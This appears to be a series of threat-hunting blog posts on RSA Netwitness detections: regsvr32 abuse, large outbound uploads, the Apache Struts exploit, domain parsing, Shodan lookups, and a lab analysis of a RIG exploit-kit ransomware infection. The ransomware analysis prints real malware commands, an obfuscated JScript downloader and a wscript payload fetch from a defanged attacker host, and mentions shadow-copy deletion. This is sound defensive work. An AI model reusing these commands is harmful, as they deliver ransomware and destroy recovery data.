[se].LaunchArguments_Target LIKE N'%/i:http%'

 

--ORDER BY se.EventUTCTime desc
ORDER BY mn.MachineName desc
*/

 

-- IIOC

SELECT DISTINCT

[se].[FK_Machines],
[se].[FK_MachineModulePaths]
--,[se].[PK_WinTrackingEvents] AS [FK_mocSentinelEvents]  

-- If you are using 4.3.0.4, remove the comment dash above


FROM

[dbo].[WinTrackingEventsCache] AS [se] WITH(NOLOCK)

 

WHERE

[se].[BehaviorProcessCreateProcess] = 1 AND
[se].FileName_Target = N'regsvr32.exe' AND
[se].LaunchArguments_Target LIKE N'%/i:http%'

 

OPTION (RECOMPILE);

 

 

I hope you find this useful and as always, happy hunting.

 

Chris

If you have been using RSA Netwitness Packets for any length of time, you might have noticed that many large sessions are maxed out at approximately 32mb.  Furthermore, there maybe multiple 32mb sessions between the two hosts. 

 

 

Beginning in 10.5, a new meta key was added called 'session.split' to track follow-on sessions that are related.  While the decoder settings may draw the line at 32mb (the default setting and I don't recommend changing) for a session, network traffic is not bound by such restraints.  Network traffic can be as large as it has to be.  All of this traffic is still captured, but there wasn't anything really tying all the sessions together.  However, with session.split, we can see that there is more network data to be found.  In the 'List View' screenshot above, you can see the numbers on the far right of the session.  You can right click on that number and find the session fragments in a new tab.

 

If that view doesn't work for you, you can build your own custom view like the one below.

 

 

Recently, I was having a discussion with some colleagues about how to find uploads greater than 1 GB in size that are going outbound.  This was to identify some potential exfiltration use cases.  One thing that came to mind was using meta in 'session.split'.  In a few short minutes, I had an application rule built by using some of the content from the Hunting Pack content (RSA Announces the Availability of the Hunting Pack in Live  ).  Let's break it down.

 

First, we know that it would be outbound network traffic.  Therefore, we could start our application rule with:

 

('medium = 1 && direction = 'outbound')

 

If you don't have directionality setup in your decoders, you could substitute "direction = 'outbound'" with "org.dst exists".

 

Next, we look at the new meta key from the hunting pack called 'analysis.session' (aka Session Characteristics).  This purpose of this meta key is to tell the analyst things that were observed about the network session.  In our case, we are looking for 'ratio high transmitted'.

 

The meta 'ratio high transmitted' is a reference to a calculation of the transmitted bytes (requestpayload) vs the received bytes (responsepayload) in a network session.  It provides a ratio score of 0 - 100 showing which side sent more data.  A score of 0 means more bytes were received than transmitted.  A score of 100 means more bytes were transmitted than received.  Since we are looking for uploads, that would typically have more data being transmitted than received in a network session.  Therefore, we can add this meta to our app rule.

 

('medium = 1 && direction = 'outbound' && analysis.session = 'ratio high transmitted')

 

However, we aren't done yet.  How do we tell if it is around or over 1 GB?  This is where session.split comes in.  Since the sessions were being maxed at 32mb per the default decoder configuration, we can do some math to find out how many sessions it would take to get to approximately 1 GB.

 

1024 mb / 32 mb = 32 sessions.

 

Since there could be retransmitted data or some other anomalies in the traffic, lets give ourselves an approximate session count of 30.  This means that if session.split reached 30 splits (really 31 since it starts from 0), then we have a large session and may want to have a closer look.

 

Therefore, our application rule looks like:

 

('medium = 1 && direction = 'outbound' && analysis.session = 'ratio high transmitted' && session.split >=30)

 

 

I called mine "large_outbound_transmit' but you can call it whatever you like.  This will tag any of those follow-on sessions that matched the criteria we set in the app rule starting at session.split 30.  To find all the session fragments, go back into the Investigation Events, select the List view.  Right-click on the session.split number (not the little icon to the left of it) and select 'Refocus or Refocus New Tab'.

 

 

 

What's nice about this rule is that it works whether the content is encrypted or unencrypted.  It is simply working against meta we've already collected.  Now, I can tell if I have large network sessions leaving my network.  If you regularly have large sessions, perhaps creating a filtering application rule or feed may help reduce some of that noise.

 

More information about session.split and understanding its configuration can be found here: Investigation: Combine Events from Split Sessions 

 

I hope you found this post helpful, and as always, happy hunting.

 

Chris

UPDATE - March 21, 2017 

Due to continued interest in this event and continued public exploitation, we’ve added detection to the HTTP_lua parser.   Customers will get this update automatically via the LIVE update process if they are subscribed to this content.    The following meta is created if the parser is triggered:

 

ioc=”apache struts exploit attempt”

analysis.service=”content-disposition  filename contains null character”

 

Thanks!  

 

 

Since the release of CVE-2017-5638, the RSA Incident Response team has fielded several questions about how to detect this activity.  Proof of concept code is already available and being used to identify vulnerable servers.  Fortunately, detection with Netwitness Packets it is quite easy.

 

The packet decoder contains HTTP parsers that will parse out much of the HTTP headers.  Since this exploit appears to be using a malformed Content-Type entry, we can detect this by examining meta already coming in.

 

One thing to note is that this traffic still appears as valid HTTP traffic.  It appears like a typical POST and has valid HTTP headers with the exception of the malformed Content-Type.

 

 

Another included an HTTP GET.

 

 

One way to find this traffic is using existing meta combined to make new meta.  We can make an app rule out of this.  Lets examine the meta.

 

 

We already have service type of 80 (HTTP)  and a long content meta.  We can pick out interesting pieces from the content meta key such as "_member".

 

Therefore an application rule might look like:

 

service=80 && content contains '_member'

 

If we turn that into a query to double-check our work, we should get the session(s) of interest:

 

 

 

I've attached a sample PCAP of the POST if you need to replay.  Another, showing an HTTP GET was found on the SANS Internet Storm Center site here:  Critical Apache Struts 2 Vulnerability (Patch Now!) - SANS Internet Storm Center 

 

Happy Hunting,

 

Chris

This came out of a separate discussion but I thought it could be helpful for others.

 

A customer was looking to write an ESA rule that essentially was doing an 'ends' against alias.host meta.  For example, 'bad.malicousdomain.com' or 'really.bad.maliciousdomain.com' could be looked for by 'maliciousdomain.com'  Things like this could actually be done on the decoder and created as meta for easy searching.

 

You could create application rules on your decoders that specifically look for the domain of interest.

 

name=maliciousdomain rule="alias.host ends 'maliciousdomain.com'" alert=alert type=application

 

Then, just have ESA look for    alert = 'maliciousdomain'  since it will already be meta at that point.

 

You could also look for the root host for any and all sessions where alias.host is populated.  I wrote a parser to help with that.  The purpose being that if I wanted to exclude any domain, I could.  This uses a custom meta key called 'root.host', so an index change on the concentrators would be needed if you wanted to query against it.  If you want to change the meta key, feel free to do so.

 

 

The parser works by performing a meta callback against 'alias.host' and then examining the location of all the dots in the hostname.  It then compares the last position against the TLD's listed in a table and then moves to the left if found.  

 

Since this is just performing a meta callback, it can work on both packet and log decoders.  Just remember that on log decoders, you would need to add the nwll.lua file.  You can download it from Live and deploy it manually.

 

Happy hunting.

 

Chris

The RSA Netwitness Suite has a lot of data flowing into it.  However, it does not take in everything.  Context, which is necessary to properly maintain situational awareness, can come from other sources and can help analysts find answers to the questions they have.  One such source is Shodan.

 

Shodan is a search engine that can be used to find information about computers and other devices that are connected to the Internet.  From web servers to web cameras...routers to refrigerators.  Shodan has a wealth of information about those IP addresses and hostnames and that information can be queried with an authorized account.  This could tell you public information about your own organizations systems and address space that you were not aware of previously.

 

To make the search a little easier, you could take IP's and hostnames found in the RSA Netwitness Suite and pivot into a Shodan search for them.

 

I created a couple of right-click plugins that could be used on the RSA Netwitness server in the Investigations module.  They can be created in the following way:

 

Go to your server with an administrator account and go to Administration, System and click on the Context Menu Actions.  Then, click on the ( + ) plus icon.

 

 

Then, copy and paste the text from the plugin file into Context Menu Configuration editor box.  Since there is one for IP addresses and another for Hostnames, you would perform this task twice.

 

 

When finished, click ( OK ).  This will save the plugin.

 

You should now see two new plugins in your list.

 

 

You will likely have to close or refresh the Investigator browser tab and reopen it.  Then, right click on either the IP address or alias.host meta and you should see the option for an External Lookup into Shodan.

 

 

 

Hopefully, this provides you with a bit more knowledge and understanding about the data you see every day.

 

Good luck and happy hunting.

 

Chris

*** Warning the sites referenced contain live exploit kits and malware. As always please exercise proper caution when working with live malware. ***

 

Ransomware has elevated itself into a clear and present threat that organizations faced in 2016.  Unfortunately, this threat is likely to continue into 2017 and beyond.  As businesses and vendors work at combating these and other threats, it is important to understand what is happening on both the network and endpoints so that we can all properly recognize and respond when such an incident occurs.  This post is an attempt to reveal what incident responders may see in the course of defending the business.  It intends to show what a single drive-by attack may look like from both the network and host points of view.

 

First, the architecture.  This is a lab environment running RSA Netwitness Suite 10.6.1.  A Packet Decoder is monitoring the internet ingress and egress points from a mirror port on a managed switch.  This is mainly outbound client activity.   The Event Stream Analytics (ESA) appliance is also available.  There is no web proxy in this environment.  The workstation that gets compromised is a Windows 7 VM running IE 8 and Flash 14. These are obviously old versions but useful for exploitation.  The RSA Netwitness Endpoint (ECAT) 4.2.0.2 agent is installed and set to Full User-Mode Monitoring.

 

 

Next, we need some malicious code.  For that, I looked at the fantastic malware and packet captures at Malware-Traffic-Analysis.Net.  There is some amazing work being done here and is an excellent reference point to compare what was observed in network traffic as well as what happens on the host.  Specifically, I was looking at this:

 

2016-11-21 - RIG EK DATA Dump (http://malware-traffic-analysis.net/2016/11/21/index2.html)

 

Rather than uploading a PCAP or infecting the host with the malware sample, I had the system visit the same compromised website as referenced in the post.

 

 

In a few moments, I can see the ransom note appear on my victim PC's desktop.

 

 

As if that wasn't enough, the malware was kind of enough to change my desktop to include the ransom note as well.

 

This is all well and good, and you would certainly be aware you have a problem, but what was captured on the wire and on the host.  Let's start with the network traffic.

 

 

The first thing we see is an HTTP GET to the compromised site.  

 

 

We can see it is likely a Wordpress site and that it had gzip content encoding.  If we scroll a little further down in the session, we can see a suspicious looking iframe that appears to have been injected into the page.

 

 

 In , we can see the DNS lookup and HTTP GET to 'red[.]mobilaile[.]com', which hosts malicious content.  If we look closer at the 'rxbytes' meta, we can see that the victim PC received 56,810 bytes of data.  When we have a closer look at that session, we can see the delivery of a suspicious script...

 

and then a suspicious Adobe Flash file.

 

This winds up being the exploit payload to compromise the host.  The content type of "application/x-shockwave-flash" may be something we could use in the future.

 

Once exploited, this brings us to   in this attack which is the delivery of the threat actor's payload.  Also notice the 'rxbytes' of 254,598 bytes.

 

 

Also important is the content-type of "application/x-msdownload".  You will notice that there doesn't appear to be an MZ file header in this session.  That is because this malicious binary is using RC4 encryption and will be decrypted on the host just in time to do it's real purpose.

 

Lastly, we see several UDP attempts to some IP ranges on port 6892.

 

This essentially concludes the network activity of this malicious code.  Lets look at what happened on the endpoint itself.

 

 

First, we see the Internet Explorer process (iexplore.exe) create a process for cmd.exe.  The Target Command Line shows us it is executing an 'echo' followed by what looks to be a loop.

 

 

CMD command
cmd.exe /q /c cd /d "%tmp%" && echo function O(n,g){for(var c=0,s=String,d,D="pu"+"sh",b=[],i=[],r=(/**/255),a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g.length)^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,S="fromC"+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};function H(g){var T=u(0),d=W(T+"."+T+u(1));d./**/setProxy(n);d.open(u(2),g(1),n);d.Option(0)=g(2);d["\x53en\x64"];if(200==d.status)return…

 

 

Next, we see the Windows Scripting Host (wscript.exe) writing to an executable named 'rad9612F.tmp.exe' as it was executing a script.  Furthermore, it was retrieving the file from 'red[.]mobilaile[.]com' which we saw in the network section step 3.  The file was RC4 encrypted.  The script below uses the key "gexywoaxorto decrypt the file on the host.

 

wscript command
wscript  //B //E:JScript MXj6sFosp "gexywoaxor" "hXXp://red[.]mobilaile[.]com/?q=w3jQMvXcJxbQFYbGMvvDSKNbNkzWHViPxo-G9MildZuqZGX_k7DDfF-qoV3cCgWR&sourceid=msie&aqs=msie.103j68.406n6u8&oq=xfotJbpWbAXj2UKGewJind9cBF5A8KCu3EjdmhGbhZ-Fq0SEaQpD96KWELALhR32&es_sm=116&ie=UTF-8" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

 

Next, we see cmd.exe creating the 'rad9612F.tmp.exe' process.  As it is doing this, the 'rad9612F.tmp.exe' process also writes to 'System.dll'.  This file is located at "C:\Users\analyst\AppData\Local\Temp\nslC925.tmp\" on the endpoint.

 

 

This could be something of interest and we can ask RSA Netwitness Endpoint (ECAT) to retrieve that file for us so that we can conduct additional analysis.  We could even blacklist the file hash and then identify any other system that might have it.

 

 

In step 4, we can see that wscript is run again, this time creating the file 'rad29123.tmp.exe' and placing it in the "C:\Users\analyst\AppData\Local\Temp\" directory.

 

 

Step 5 is crucial as now the "rad29123.tmp.exe' module is calling cmd.exe to execute the Windows Management Instrumentation Command-line (wmic).  It does this so that it can run 'wmic.exe  shadowcopy delete'. This would delete any volume shadow copies on the host to prevent the victim from being able to restore files.

 

 

At this point, the system is compromised and data is lost.  Step 6 shows the calling of the mshta.exe process to launch the ransomware note and step 7 shows the processes being stopped with the taskkill command.  Eventually, rad9612F.tmp.exe' deletes itself.

 

There were several Instant Indicators of Compromise (IIOC's) that were part of this and could be useful for future investigations.

 

One thing about ransomware is that it is noisy.  There isn't much that is stealthy about it.  It wants you to know you have been compromised so that you would pay the ransom to get the decryption tool and recover your data.  This activity can be detected with network and endpoint indicators.  ESA can also help as we can string some different network indicators together across multiple sessions.

 

 

One custom ESA rule to help detect possible flash exploitation is as follows:

 

flash_to_download

module Module_flashdown_20161109093400;



@Name('Module_flashdown_20161109093400_Alert')
@Description('flash_to_download')
@RSAAlert(oneInSeconds=0)

SELECT * FROM Event(
/* Statement: find_flash */
(isOneOfIgnoreCase(content,{ 'application/x-shockwave-flash' }))
OR
/* Statement: find_download */
(isOneOfIgnoreCase(content,{ 'application/x-msdownload' }))

).win:time(15 seconds)
MATCH_RECOGNIZE (
PARTITION BY ip_src
MEASURES E1 as e1_data , E2 as e2_data
PATTERN (E1 E2)
DEFINE
E1 as (isOneOfIgnoreCase(E1.content,{ 'application/x-shockwave-flash' })),
E2 as (isOneOfIgnoreCase(E2.content,{ 'application/x-msdownload' }))
);

 

This rule looks for content-type 'application/x-shockwave-flash' followed by content-type 'application/x-msdownload' within 15 seconds for the same source IP.  If your environment is capturing in front of a web proxy, you may be able to partition by 'orig_ip', which would be the originating IP address provided there is an x-forwarded-for header.  If there is no x-forwarded-for header available to you, contact your network and/or proxy administrators.  Just make sure the header gets removed before it leaves the perimeter firewalls.  This type of information is incredibly valuable to analysts.

 

This rule did require a change to how the 'content' meta key is recognized by ESA.  Normally, 'content' is listed as a string.  This means, it would only have one single value per session.  However, there could be multiple content-types in a particular network session.  Therefore, I needed to change this from a string to an array.  Doing so was relatively easy.  I simply added the 'content' meta key as an array and restarted the ESA service.

 

 

To restart the ESA service, ssh to the appliance and issue 'service rsa-esa restart'  Once restarted, 'content' was listed as an array.

 

Thats all for now.  Good luck out there and happy hunting.

Filter Blog

By date: By tag: